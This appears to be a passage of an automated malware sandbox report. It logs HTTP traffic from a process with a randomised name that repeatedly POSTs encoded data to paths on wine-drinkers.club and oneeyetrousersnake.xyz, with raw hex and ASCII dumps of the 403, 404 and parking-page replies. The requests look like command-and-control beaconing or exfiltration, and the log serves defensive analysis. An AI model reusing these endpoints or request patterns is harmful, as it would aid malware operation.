                                                  Jan 10, 2025 20:11:28.345489025 CET1236INData Raw: 64 69 6e 67 2d 6c 65 66 74 3a 2e 36 38 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 38 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d
                                                  Data Ascii: ding-left:.6875rem}.window-main__item{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem
                                                  Jan 10, 2025 20:11:28.345503092 CET1236INData Raw: 65 6d 20 2c 2d 30 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35
                                                  Data Ascii: em ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:cal
                                                  Jan 10, 2025 20:11:28.345513105 CET1236INData Raw: 6d 20 2b 20 2e 31 38 37 35 2a 28 31 30 30 76 77 20 2d 20 32 30 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31
                                                  Data Ascii: m + .1875*(100vw - 20rem)/ 25.625)}}@supports (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:cl
                                                  Jan 10, 2025 20:11:28.345520973 CET776INData Raw: 20 2c 31 2e 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34
                                                  Data Ascii: ,1.875rem)}}@supports not (margin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-color: #0E0F
                                                  Jan 10, 2025 20:11:28.345525980 CET1236INData Raw: 39 39 20 34 31 38 2e 34 37 32 20 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 20 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 5a 22 20 66 69 6c 6c 3d 22 23 30 30 34 39 38 44 22 20 2f 3e 0a 09 09 09 09 09 09 3c 2f 67 3e 0a 09 09 09 09 09 09 3c 67
                                                  Data Ascii: 99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)"><ellipse cx="50.6112" cy="60.3996" rx="50.6112" ry="60.3996" transform="matrix(-0.916366 0.400341 -0.15071
                                                  Jan 10, 2025 20:11:28.345534086 CET1236INData Raw: 22 30 22 20 72 65 73 75 6c 74 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 42 6c 65 6e 64 20 6d 6f 64 65 3d 22 6e 6f 72 6d 61 6c 22 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69
                                                  Data Ascii: "0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_5" /></filter><filter
                                                  Jan 10, 2025 20:11:28.345540047 CET1236INData Raw: 6d 61 69 6e 20 68 61 73 20 61 6e 20 41 41 41 41 20 72 65 63 6f 72 64 2c 20 62 75 74 20 74 68 65 20 73 69 74 65 20 6f 6e 6c 79 20 77 6f 72 6b 73 20 77 69 74 68 20 49 50 76 34 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 3c 2f 6c 69 3e 0a 09 09 09
                                                  Data Ascii: main has an AAAA record, but the site only works with IPv4 on the server.</li></ul></div><div class="window-main__actions"><a href="https://kb.fastpanel.direct/troubleshoot/" class="window-main__link _link">View more
                                                  Jan 10, 2025 20:11:28.346322060 CET648INData Raw: 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75 6c 74 3d 22 73 68 61 70 65 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 37 35 22 20 72 65 73 75 6c 74 3d
                                                  Data Ascii: roundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_10" /></filter><filter id="filter1_f_2001_10" x="27.2657" y="0.225037" width="703.261" height="829.52" filterUnits="


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  9 | 192.168.2.9 | 64523 | 194.245.148.189 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 10, 2025 20:11:33.404979944 CET | 721 | OUT | POST /hakt/ HTTP/1.1
                                                  Host: www.wine-drinkers.club
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 196
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.wine-drinkers.club
                                                  Referer: http://www.wine-drinkers.club/hakt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Ascii: rdmhfXe=U185+ex9Ij9AXQeCjLulRxQTLtgm5dRRFlZ+3GNhi+DWgaGUE8ofBlEyx3u7wNg2mbn8n7Z4xLL6PIn0QjHeD/pfL4y0T/gwtyLi6zZicCoKEzgFWlNouh6MkifyftWu42GWmaAhRjz7Uj8f/hb8XQTWFyRH1JXXD/qGZZMTT7LpQ0eeotyiBBWyweis
                                                  Jan 10, 2025 20:11:34.312269926 CET | 165 | IN | HTTP/1.1 403 Forbidden
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:34 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Jan 10, 2025 20:11:34.312556982 CET | 560 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  10 | 192.168.2.9 | 64524 | 194.245.148.189 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 10, 2025 20:11:35.947566032 CET | 745 | OUT | POST /hakt/ HTTP/1.1
                                                  Host: www.wine-drinkers.club
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 220
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.wine-drinkers.club
                                                  Referer: http://www.wine-drinkers.club/hakt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Ascii: rdmhfXe=U185+ex9Ij9AWwuCvMClXRQQFNgmiNRNFlF+3HZPjMXWh/6UF9ofElEy7Xu66tg5maben6l4xLP6PMj0QQ+sCvpZDYy2QPgwtyLi611bcCgKFDwFUAhrth6LjifyV9Wq42H7meYLRgL7Uh0fxUnzeQTQLSQ49ZOSadeudbssLdL7e1iA5f75UWWV35rEYeA4aOvclustoCWmlMUNFw==
                                                  Jan 10, 2025 20:11:37.284096003 CET | 165 | IN | HTTP/1.1 403 Forbidden
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:37 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Jan 10, 2025 20:11:37.285154104 CET | 560 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  11 | 192.168.2.9 | 64525 | 194.245.148.189 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 10, 2025 20:11:38.492543936 CET | 1758 | OUT | POST /hakt/ HTTP/1.1
                                                  Host: www.wine-drinkers.club
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 1232
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.wine-drinkers.club
                                                  Referer: http://www.wine-drinkers.club/hakt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Ascii: rdmhfXe=U185+ex9Ij9AWwuCvMClXRQQFNgmiNRNFlF+3HZPjNvWgNCUDeAfHlEy33u36tgkmbzan6oDxJn6Nvr0HR+sMfpZP4y7T/h0tybm6zVbcCgKFF0FQVNrhB6Mkif+ftWS4wuOmeUxQRr7UCcfzmPzRQTSbCQg9ZyZadS1dfsGLa/7dj73reGgXQO19bvaAbdcYMfZy/sDxnzEmvRod4irLlKrmvKe85cPIvGGOKbs/5a9mkHJBPAxFHkfM3PzwD+wzEXDU42g5Q6imn8ob7VGkxYrZWQEa2RsLcw7dHy8NkMmOJp+wYZSzYnz5M5CR9KeEW4JmvpTFSMLZ0OSDY6eVMnB835F54gD6GQ1VN2NaQhp+shwIdRy27lagop/qQfeTf1jV3SBOP2lfzEgqS02W7e7AVpe7QCs+Jt1H0HyDmwCh3Wr3JzB0uOs7GVmFHIc8HHdpwVknmPXD6wOVMEhAzYE+xRDqhXZjdcd5iZi781ye/mxvxW7iccCpttdX9s1q9m+f3kRvImblIFy1H5l2svJpdROgy4bGWZbQw4mCf5QC/704NIX4Z2rJeVwUc9VkBoJ4VaIkqJgfShh2N06sHUIxsNCOKfJKNpmlKUjGdB4rKXftjYhIA8LrvC15uJAMbd+ijFrYGcWwKWzDMiVU0K7kKtG35EFlCRinHyn5jqziYN80FzX0YW3KwlmytHUoGXkhR91xMAnv5x5Ctro93J+ZHqx7i02ZFvk4krdqgZhkbT35LS/TXpMAdLNRmEsQGDVkBPemB7vCdxX09R5newnOp+ry6EVoQ16cc1ZeRqWUYrLUptKCu2XY+8H8Ww/RYfhJ53KEJLIF1cxnQXM1XGJN4V5Cvodm0S40M79zf/ppl4BxdCorYta7XYFsu+x7LQpqGbiQteHar4RobC980N8lgWg+wDzDrzdRCrBPmzt3U2Mxboxg8wLDcg8h4aQ18RUQXuFwgIabQG7rItWRhTVtUXdCxSZuUXjVl3valaN [TRUNCATED]
                                                  Jan 10, 2025 20:11:39.489900112 CET | 725 | IN | HTTP/1.1 403 Forbidden
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:39 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  12 | 192.168.2.9 | 64526 | 194.245.148.189 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 10, 2025 20:11:41.032916069 CET | 445 | OUT | GET /hakt/?rdmhfXe=Z3UZ9pkvUTN8eySircCOaDAcK9AA6JZfB0YdpGFssPaitvOOGMcOB1EIrUeEo9sxw4W4nK9e2r79OuzvY2TkP9tUb4eHWat+jQL942ZrdRgvNUE9NQ==&AF=At8pGDY0Z HTTP/1.1
                                                  Host: www.wine-drinkers.club
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Jan 10, 2025 20:11:41.789422035 CET | 1236 | IN | HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:41 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 1840
                                                  Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT
                                                  Connection: close
                                                  ETag: "58e3a61e-730"
                                                  Accept-Ranges: bytes
                                                  Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --> <meta name="description" content=""> <meta name="author" content=""> <meta http-equiv="refresh" content="5;url=/" /> <link rel="icon" href="../../favicon.ico"> <title>The requested page does not exist or is temporarily not available</title> ... Bootstrap core CSS --> <link href="./css/bootstrap.min.css" rel="stylesheet"> ... Custom styles for this template --> <link href="./css/parkingpage.css" rel="stylesheet"> </head> <body> <div class="container-fluid"> <div class="header clearfix"> <h3 class="text-muted"><img src="./images/JokerLogo2x.png"></h3> </div> </div><div class="
                                                  Jan 10, 2025 20:11:41.789444923 CET | 846 | IN | Data Ascii: container"> <div class="jumbotron"> <h1 class="display-3">404 - page not found</h1> <p class="lead">The page that you have requested may have moved or does not exist. Please check the URL for proper spelling and capitaliz


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  13 | 192.168.2.9 | 64527 | 63.250.43.134 | 80 | 6568 | C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 10, 2025 20:11:47.197618961 CET | 733 | OUT | POST /4inx/ HTTP/1.1
                                                  Host: www.oneeyetrousersnake.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 196
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.oneeyetrousersnake.xyz
                                                  Referer: http://www.oneeyetrousersnake.xyz/4inx/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Ascii: rdmhfXe=hB7jiLqDgxzBTTC3w4/8DR4nlmw8gnxJntdQnc+W+D6AZlHybdPliSmWhAvvUyWuEqCOIlxTpuioshT9T/bcjallQdA977xA2COwma/7GvNS3iM1DPhA/Fh+cDck8QLDN2iuvAZMmYPuMJBtLNpNIMdvx/XAbmt75NWwoZpgZD1ghRBHwZILdL9mZXO+
                                                  Jan 10, 2025 20:11:47.778930902 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                  content-type: text/html
                                                  date: Fri, 10 Jan 2025 19:11:47 GMT
                                                  transfer-encoding: chunked
                                                  connection: close
                                                  Data Ascii: 11FA<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64, [TRUNCATED]
                                                  Jan 10, 2025 20:11:47.778949022 CET1236INData Raw: 62 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c 59 42 53 38 72 77 73
                                                  Data Ascii: biJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4iE02PyxAS39NZcZ9oCD
                                                  Jan 10, 2025 20:11:47.778959990 CET1236INData Raw: 6a 47 59 32 67 4d 49 39 55 4c 67 58 34 57 67 75 31 44 75 55 63 79 39 51 6f 45 75 4d 76 71 36 31 70 79 48 67 2b 4a 38 50 6e 6b 45 35 66 52 48 73 54 31 39 44 38 46 45 4f 42 39 77 66 68 39 53 47 7a 5a 42 43 64 31 4d 61 37 6a 48 4b 56 59 4c 5a 49 5a
                                                  Data Ascii: jGY2gMI9ULgX4Wgu1DuUcy9QoEuMvq61pyHg+J8PnkE5fRHsT19D8FEOB9wfh9SGzZBCd1Ma7jHKVYLZIZAsc+xDpOnLDj7xxZvrnHjUdOAdw6220zP9tWP3YucRRtabeV3Setztm+WNOWBmoLt2/tBOlb0uzZT2RZeWD+meWbaPOW9+GNrAeY+JjcDDfP8fAYe5cVFu/02q26h1KksDy45nbxTNgtVHK+YGydm0+mjYcCkwLwY
                                                  Jan 10, 2025 20:11:47.778971910 CET1236INData Raw: 46 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70
                                                  Data Ascii: FnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKui
                                                  Jan 10, 2025 20:11:47.778985977 CET896INData Raw: 55 49 35 5a 65 44 58 55 65 35 43 68 47 52 56 68 6f 45 57 2b 52 6c 51 71 7a 4f 79 75 2b 57 61 4b 62 61 4d 68 71 70 64 72 5a 66 42 2f 37 57 4d 35 73 4b 66 41 6a 4f 4a 6e 51 4f 4a 63 71 42 63 4b 4b 64 4d 56 38 71 64 30 2f 75 30 34 79 65 4f 6a 6d 4c
                                                  Data Ascii: UI5ZeDXUe5ChGRVhoEW+RlQqzOyu+WaKbaMhqpdrZfB/7WM5sKfAjOJnQOJcqBcKKdMV8qd0/u04yeOjmLsO6wIfJgL9nx5MPBi5i8t+ihh4HRsLYK2AWBmZvBinGMLTL/+NtT+Ibzj5JINMTtmzadPzTw3nnhQSfYwrujUi8y5qq+bX5FMGkvZcXS+xB4grY5PUfCZ2tf49O1/6DCuGJ+HcuF0JZ7GDSckBH4NHuJMnUQZBNdL
                                                  Jan 10, 2025 20:11:47.778996944 CET1236INData Raw: 46 4c 69 31 47 44 30 54 56 77 52 72 58 30 44 35 2b 49 46 69 34 42 56 4f 72 56 5a 4e 71 65 53 4d 41 6d 62 4f 44 6a 5a 76 62 59 5a 54 34 4b 31 37 53 39 56 6a 37 4c 68 74 7a 48 72 72 2f 59 4b 6c 76 54 6a 2f 4e 6a 47 78 75 59 46 54 33 49 75 37 66 30
                                                  Data Ascii: FLi1GD0TVwRrX0D5+IFi4BVOrVZNqeSMAmbODjZvbYZT4K17S9Vj7LhtzHrr/YKlvTj/NjGxuYFT3Iu7f0okac7Wo9gJP3J3p6rjlVhZwWruneg6YGhXL5O9pwChPdsvUiM8QYlxHdC8VEm1VzJ5FIsgffR0uMU1K1NBAKNIys37Xbyqdy9baVMJDqcbG5tySVZsZcFD3TiWX2P5KqCS/lnWaY6Y8u2/OLa181I//Q42NP3LXzq
                                                  Jan 10, 2025 20:11:47.779004097 CET1236INData Raw: 35 4d 52 2f 32 53 51 44 76 46 69 6a 67 7a 37 5a 4a 41 50 2f 32 4f 4f 44 2f 70 69 6a 67 2f 36 5a 4a 41 50 2f 32 4b 4f 44 50 74 6b 6b 41 37 78 5a 35 4d 52 2f 32 57 53 45 4f 6c 67 6b 41 74 73 41 41 41 41 41 46 79 48 43 69 39 6c 6b 77 37 34 5a 5a 49
                                                  Data Ascii: 5MR/2SQDvFijgz7ZJAP/2OOD/pijg/6ZJAP/2KODPtkkA7xZ5MR/2WSEOlgkAtsAAAAAFyHCi9lkw74ZZIQ6WaRDMhjjwz1ZZAP/2SPEP9kjxD/ZI8Q/2SPEP9lkA//Y44M92SRC8lkkRHnZZIO+12OBDRhiwpJYo8O0VmFBihVfwAGYo4PdGeTEf9kjxD/ZI8Q/2SPEP9kjxD/Z5QR/2KOCHpVfwAGWYkGJWWQDs5kjQNRSG0A
                                                  Jan 10, 2025 20:11:47.779016972 CET1236INData Raw: 3b 62 61 73 65 36 34 2c 64 30 39 47 4d 67 41 42 41 41 41 41 41 4c 44 41 41 42 49 41 41 41 41 43 4f 46 77 41 41 4c 42 57 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 30 5a 47 56 45 30 63 47 6f
                                                  Data Ascii: ;base64,d09GMgABAAAAALDAABIAAAACOFwAALBWAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGoEqG4LpJByweAZgAIcGCIEYCZoWEQgKhO1IhJwbC4dkAAE2AiQDj0QEIAWNOAeaYwyBI1uUCpID5cbuH9ecjgwq3YYQBPPTZWZv5Rs4HRaCOP21M7bnujyaj5ZWMd0mdbeD7Q+5niD7/////9+xTGS4Lgc1SVtaGBT
                                                  Jan 10, 2025 20:11:47.779028893 CET | 1236 | IN | Data Raw: 52 48 51 74 4a 78 70 4f 33 4f 2b 31 2f 63 39 4f 6a 30 6d 51 4f 7a 76 34 4f 37 75 49 66 56 6b 73 33 34 55 4d 6d 6a 79 72 4b 61 45 6f 53 56 66 64 4c 46 36 30 2b 4f 58 65 6c 6c 79 70 71 6a 54 61 55 6e 59 32 56 2f 59 5a 39 2b 5a 37 61 6b 6b 4f 47 41
                                                  Data Ascii: RHQtJxpO3O+1/c9Oj0mQOzv4O7uIfVks34UMmjyrKaEoSVfdLF60+OXellypqjTaUnY2V/YZ9+Z7akkOGA9GonTXGoK8XfgQZa38JGOYkoGNg+6I/7o9vkybIu2mgwR/4yUWR5ZiO5FbloolXmcttuawUqzvE1anTQI8Muw93hfOJAwnQaJyFqxOX/+jSm/vwZoSwiSgAABEnz83Cex/n0Vih8QOOcxrrVKn6mmKYhA3llp8FIM
                                                  Jan 10, 2025 20:11:47.779042959 CET | 1236 | IN | Data Raw: 67 6e 63 2f 59 2b 72 54 74 7a 58 74 64 64 39 61 62 57 49 45 42 64 30 52 6b 62 45 65 61 48 76 7a 36 44 66 74 62 32 6d 6f 35 74 71 76 4a 35 34 53 4e 49 45 47 73 34 57 56 6d 52 55 34 66 58 4e 43 67 46 39 39 4b 70 51 41 34 4a 66 33 76 42 6e 65 2f 67
                                                  Data Ascii: gnc/Y+rTtzXtdd9abWIEBd0RkbEeaHvz6Dftb2mo5tqvJ54SNIEGs4WVmRU4fXNCgF99KpQA4Jf3vBne/gnyk+v/h8DZwCctRrhAkVCUKFS0fKhAAapQGVSuHFWhGqpRg6otFhYWBy06LiymeLS49sLWtRVpW/dg99PQHqTDHmahPcmGPc1Dex2GvYmivSuAGDBA3YcQAmeqshC57/3PxyB/6bOUD0YMcMw3IISwurzxeIBBT2O
                                                  Jan 10, 2025 20:11:47.783998013 CET | 1236 | IN | Data Raw: 51 57 32 42 37 30 64 78 31 45 42 71 56 2f 72 79 41 33 67 42 49 68 74 46 42 5a 32 4c 34 51 61 6d 4d 52 5a 46 6d 78 36 32 57 39 72 70 4f 4a 67 65 56 42 32 47 68 38 32 4e 69 49 33 53 69 50 64 43 45 71 52 6b 35 42 52 31 30 49 51 65 59 32 42 6b 59 6d
                                                  Data Ascii: QW2B70dx1EBqV/ryA3gBIhtFBZ2L4QamMRZFmx62W9rpOJgeVB2Gh82NiI3SiPdCEqRk5BR10IQeY2BkYmZhTfNii7FEWsasxGoKCu09rBLlhgDnjF0R9rPiDmkdWz5KK+W4nA1zVuKdTbBVtdTUQ4wiq9TvZuF8+SBsb0XajqvddEYiUAc6a4KtOZIMygOv+GlCDaKWC0CgI2FFiEsKitEE8VCiTYDN1F79a6Yes4k7IQlSMnI


                                                  Session ID: 14
                                                  Source IP: 192.168.2.9
                                                  Source Port: 64528
                                                  Destination IP: 63.250.43.134
                                                  Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 10, 2025 20:11:50.325601101 CET | 757 | OUT | POST /4inx/ HTTP/1.1
                                                  Host: www.oneeyetrousersnake.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 220
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.oneeyetrousersnake.xyz
                                                  Referer: http://www.oneeyetrousersnake.xyz/4inx/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 68 42 37 6a 69 4c 71 44 67 78 7a 42 54 7a 53 33 6a 4c 6e 38 49 52 34 6b 70 47 77 38 75 48 77 68 6e 74 42 51 6e 5a 65 47 35 77 65 41 5a 45 33 79 61 63 50 6c 73 79 6d 57 76 67 75 45 62 53 57 62 45 71 2b 73 49 6b 4e 54 70 75 65 6f 73 67 44 39 50 59 50 66 69 4b 6c 6e 49 74 41 37 6a 62 78 41 32 43 4f 77 6d 61 72 42 47 72 68 53 32 53 63 31 4d 4e 5a 44 32 6c 68 2f 4c 7a 63 6b 34 51 4c 48 4e 32 69 41 76 46 6c 69 6d 63 2f 75 4d 4e 52 74 4c 63 70 4b 47 4d 64 6c 31 2f 57 6e 4c 6e 45 49 77 2b 65 34 70 49 31 64 4f 53 4a 45 69 77 39 5a 68 72 42 51 49 63 39 42 65 77 48 57 4d 73 76 48 33 6f 6c 44 46 44 64 59 66 33 5a 67 6f 4c 2b 34 72 77 3d 3d
                                                  Data Ascii: rdmhfXe=hB7jiLqDgxzBTzS3jLn8IR4kpGw8uHwhntBQnZeG5weAZE3yacPlsymWvguEbSWbEq+sIkNTpueosgD9PYPfiKlnItA7jbxA2COwmarBGrhS2Sc1MNZD2lh/Lzck4QLHN2iAvFlimc/uMNRtLcpKGMdl1/WnLnEIw+e4pI1dOSJEiw9ZhrBQIc9BewHWMsvH3olDFDdYf3ZgoL+4rw==
                                                  Jan 10, 2025 20:11:51.267721891 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                  content-type: text/html
                                                  date: Fri, 10 Jan 2025 19:11:51 GMT
                                                  transfer-encoding: chunked
                                                  connection: close
